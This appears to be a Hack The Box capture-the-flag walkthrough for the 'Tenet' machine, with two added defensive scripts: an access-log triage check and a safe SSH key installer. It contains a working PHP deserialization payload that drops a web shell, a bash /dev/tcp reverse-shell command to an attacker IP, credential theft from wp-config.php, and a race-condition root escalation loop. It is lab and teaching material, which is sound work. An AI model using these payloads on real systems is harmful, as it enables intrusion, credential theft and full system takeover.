Enumeration
Use nmap to find open ports:
nmap -sCV 10.10.10.223
Add this to your /etc/hosts
10.10.10.223 tenet.htb
Reading the Migration post on the site, we find a comment.
Trying http://tenet.htb/sator.php returns nothing, so I try the IP instead:
http://10.10.10.223/sator.php
And download the backup file:
http://10.10.10.223/sator.php.bak
Foothold
The vulnerability here is PHP object injection (insecure deserialization); see Exploiting PHP deserialization for background.
I will use it to write a new PHP file on the server that runs commands for us. We can generate the payload with:
<?php
// The class name and property names come from the downloaded sator.php.bak;
// they must match the real class or the server-side code will not act on them.
class DatabaseExport
{
public $user_file = 'users.php';
public $data = '<?php system($_GET["cmd"])?>';
}
// Serialize and URL-encode so the string can be passed in the arepo parameter.
print urlencode(serialize(new DatabaseExport));
?>
Then we have:
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D
And send the payload to the server by accessing:
http://10.10.10.223/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D
Start a netcat listener on our machine:
nc -lvnp 1234
And connect back to it by requesting (the & inside the command is encoded as %26 so it is not read as a query-string separator):
http://10.10.10.223/users.php?cmd=/bin/bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.6.63.158/1234%200%3E%261%22
The payload we use is:
/bin/bash -c "bash -i >& /dev/tcp/10.6.63.158/1234 0>&1"
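The requests above leave distinctive traces in the web server's access log: a successful download of a .bak copy of a script, and a query parameter whose value is a PHP serialized object. The following script, an added example and not part of the original writeup, runs those two checks over a few constructed Apache-style log lines; the IPs and paths only mirror the writeup's shapes.

```shell
#!/bin/sh
# Added example, not part of the original writeup: triage an Apache-style
# access log for the two request shapes used in the foothold above
# (download of a .bak copy of a script, and a query parameter carrying a
# PHP serialized object). The log lines below are constructed samples.

SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [10/Jan/2021:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.6.63.158 - - [10/Jan/2021:10:01:02 +0000] "GET /sator.php.bak HTTP/1.1" 200 912 "-" "curl/7.74.0"
10.6.63.158 - - [10/Jan/2021:10:01:40 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7B HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Jan/2021:10:02:05 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
EOF

# Successful (200) fetches of editor or backup copies of server-side
# scripts: source disclosure, which is what exposed the gadget class here.
find_backup_downloads() {
    grep -E '"GET [^" ]*\.(bak|old|orig|save|swp)( |\?)[^"]*" 200 ' "$1" || true
}

# Query parameters whose value starts with O:<len>:"<Class>" (raw or
# URL-encoded), i.e. a PHP serialized object supplied by the client.
# No ordinary request needs this, so a single hit is worth a look.
find_serialized_params() {
    grep -E '[?&][^=& ]+=O(%3A|:)[0-9]+(%3A|:)(%22|")' "$1" || true
}

# wc -l on an empty stream prints 0; strip the padding some builds add.
count_lines() {
    wc -l | tr -d ' '
}

count_backup_downloads() { find_backup_downloads "$1" | count_lines; }
count_serialized_params() { find_serialized_params "$1" | count_lines; }

# Stand-alone run: report what the sample log contains.
echo "backup-file downloads: $(count_backup_downloads "$SAMPLE_LOG")"
find_backup_downloads "$SAMPLE_LOG"
echo "serialized-object parameters: $(count_serialized_params "$SAMPLE_LOG")"
find_serialized_params "$SAMPLE_LOG"
```

Point the two find_ functions at a real access log to run the same checks; the serialized-object pattern is the more reliable signal of the two, since legitimate clients never send a PHP object graph in a query string.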
Reading /var/www/html/wordpress/wp-config.php gives us neil's password.
Use it to log in over SSH:
ssh neil@10.10.10.223
Privilege Escalation
Check what we can do with:
sudo -l
Read this file:
cat /usr/local/bin/enableSSH.sh
The script writes an SSH public key to a file in /tmp and then copies it to /root/.ssh/authorized_keys.
We can use a race condition to overwrite the file in /tmp with our own public key before it is copied to /root.
On our machine, generate a key pair with:
ssh-keygen
Our public key is saved in id_rsa.pub; we write it to /tmp in a loop with:
while true; do echo 'your-public-key' | tee /tmp/ssh-* > /dev/null; done
In another terminal, we run:
touch output.txt
while ! grep "creating" output.txt; do sudo /usr/local/bin/enableSSH.sh > output.txt; done
When the second loop stops, we can ssh in as root.
ssh -i id_rsa root@10.10.10.223
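The race exists because the script stages the key in a world-writable directory under a guessable name, so any local user can keep rewriting that file between the write and the copy. The script below is an added example, not the box's enableSSH.sh: it installs a key with no such window, by staging inside the destination directory (owned by the caller, mode 700) under an unpredictable name and renaming atomically over the target. Both paths are parameters so it can be run against a scratch directory; on a real host auth_dir would be /root/.ssh, and the key, names and sample values are constructed.

```shell
#!/bin/sh
# Added example, not the box's enableSSH.sh: install an SSH public key
# without staging it in /tmp, so no other local user gets a window in
# which to swap the staged content. Both paths are parameters so it can
# be exercised against a scratch directory; on a real host auth_dir would
# be /root/.ssh.

# Holds a literal newline, used to reject multi-line input below.
NL="$(printf '\nx')"; NL="${NL%x}"

# install_pubkey KEY AUTH_DIR
# Runs in a subshell so the umask change does not leak to the caller.
install_pubkey() (
    key="$1"
    auth_dir="$2"

    # Accept only a single OpenSSH public-key line.
    case "$key" in
        *"$NL"*) echo "rejecting key: must be a single line" >&2; exit 1 ;;
        ssh-ed25519\ *|ssh-rsa\ *|ecdsa-sha2-*) ;;
        *) echo "rejecting key: unexpected format" >&2; exit 1 ;;
    esac

    # Every file created from here on is private from its first byte.
    umask 077
    mkdir -p "$auth_dir" && chmod 700 "$auth_dir" || exit 1

    # Stage inside the destination directory (ours, mode 700) under an
    # unpredictable name, then rename atomically over the target.
    tmp="$(mktemp "$auth_dir/.authorized_keys.XXXXXX")" || exit 1
    if [ -f "$auth_dir/authorized_keys" ]; then
        cat "$auth_dir/authorized_keys" > "$tmp" || { rm -f "$tmp"; exit 1; }
    fi
    printf '%s\n' "$key" >> "$tmp" || { rm -f "$tmp"; exit 1; }
    mv -f "$tmp" "$auth_dir/authorized_keys"
)

# Helpers used to inspect the result (portable across GNU and BSD tools).
last_key() { tail -n 1 "$1/authorized_keys"; }
key_count() { wc -l < "$1/authorized_keys" | tr -d ' '; }
mode_of() { ls -ld "$1" | cut -c1-10; }

# Stand-alone run against a scratch directory with a constructed key.
demo_dir="$(mktemp -d)"
install_pubkey "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYONLYNOTREAL demo@example" "$demo_dir/.ssh"
echo "installed $(key_count "$demo_dir/.ssh") key(s), file mode $(mode_of "$demo_dir/.ssh/authorized_keys")"
```

Nothing here is ever readable or writable by another user: the staging file inherits umask 077 and lives in a directory only the installing user can enter, and the final rename is a single atomic step, so there is no moment at which a half-written or attacker-supplied file is in place. A sudo rule that runs a script like this as root is only as safe as the script's handling of temporary files, which is the real lesson of this box.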